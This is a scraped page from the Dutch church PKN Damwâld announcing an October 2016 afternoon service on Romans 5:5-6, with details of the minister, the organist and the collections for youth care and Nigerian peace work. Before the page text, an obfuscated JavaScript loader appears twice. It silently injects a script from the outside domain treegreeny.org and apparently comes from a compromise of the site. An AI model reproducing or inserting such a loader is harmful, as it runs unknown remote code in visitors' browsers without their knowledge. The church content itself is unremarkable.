;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 30 oktober 2016 14:00 uur - PKN Damwâld
zondag 30 oktober 2016
14:00 uur

Kerkdienst zondag 30 oktober 2016 14:00 uur

Thema: Gods liefde in ons hart ( Rom. 5:5-6 )

In de maand oktober is dit de derde middagdienst waar ik voor ga en ik heb geprobeerd er een “Reformatiemaand” van te maken. Omdat het bij de Reformatie (de vernieuwing van de kerk in de zestiende eeuw waaruit alle Protestantse kerken zijn voortgekomen) ging om het hart van het evangelie, wilde ik daar een aantal diensten over houden n.a.v. Romeinen 5. Vanmiddag is het thema Rom.5:5-6: ‘Gods liefde in ons hart’.

Ds. S. Boukes

vg_-01

Informatie

Voorganger:Ds. S. Boukes
Organist:Jelte Cuperus
Thema:Gods liefde in ons hart ( Rom. 5:5-6 )
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Rudolphstichting

De Rudolphstichting onderhoudt gezinshuizen en zorgwoningen in Jeugddorp De Glind. Daarnaast ontwikkelt zij projecten die de zorg voor uit huis geplaatste kinderen en jongeren verbeteren en vernieuwen. Herstel van het normale leven is hierbij uitgangspunt. Zodat deze jongeren alle kans krijgen om zich te richten op de toekomst.

Tweede collecte: Kerk
Uitganscollecte: Werelddiaconaat

Werelddiaconaat (Hervormingsdag):
Christenen en moslims werken samen aan ontwikkeling in Nigeriaanse dorpen
De verhouding tussen christenen en moslims in Noord-Nigeria is gespannen. Door de terreur van Boko Haram zijn de conflicten en gewelddadigheden onderling nog meer toegenomen. De organisatie Justice Peace and Reconciliation Movement (JPRM), partner van Kerk in Actie, brengt mensen bij elkaar. JPRM stimuleert gesprekken over vrede en gerechtigheid en helpt de inwoners daarnaast om praktisch met elkaar aan de slag te gaan. Bijvoorbeeld door gezamenlijk een waterput te slaan of een weg aan te leggen. Volwassenen kunnen bovendien bij JPRM terecht om te leren lezen en schrijven en om spaargroepen op te zetten. Het doel is dat deze mensen hun kennis en hun geld zélf in gaan zetten voor het gemeenschappelijk belang. Het effect van de samenwerking is groot. De dorpsbewoners overbruggen hun verschillen. Ze ervaren nu saamhorigheid en vertrouwen in plaats van wantrouwen en vooroordelen. In de dorpen waar JPRM actief is, ontstaat een veiliger leefklimaat. Bovendien is er meer welvaart en ontwikkeling, waar alle bewoners van profiteren. In 2016 werkt JPRM in vijftig dorpen samen met de bewoners aan vrede, verzoening en ontwikkeling.